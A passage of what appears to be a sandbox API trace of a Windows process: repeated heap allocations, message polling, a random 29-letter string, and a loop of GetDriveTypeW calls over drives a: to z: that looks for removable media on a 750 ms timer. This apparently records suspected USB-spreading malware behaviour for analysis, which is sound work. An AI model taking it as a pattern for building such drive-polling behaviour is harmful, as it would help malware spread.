hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0215.632] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.632] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.632] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.633] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.633] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.666] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.667] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.667] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.667] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.667] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.668] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.668] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.668] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.668] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.668] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.669] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.669] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.669] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.670] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.670] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.670] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.670] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.670] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.671] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.672] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.673] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.673] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.673] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.673] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.673] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.675] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.676] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.676] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.676] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.676] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.676] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0215.676] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.677] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.677] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.677] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.678] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.678] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.678] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.678] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.679] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.679] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.680] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.680] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.680] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.680] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.680] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.680] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.681] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.681] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.681] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.681] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.682] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.682] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.682] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.682] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.682] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.683] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.684] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.684] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.684] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.684] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0215.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0215.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.685] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.685] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.685] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.685] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.685] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0215.686] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.686] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.686] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.686] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.686] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.687] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.687] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.687] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.687] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.687] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.687] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.687] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.688] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.689] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.690] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.691] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.691] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.691] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.691] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.691] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) 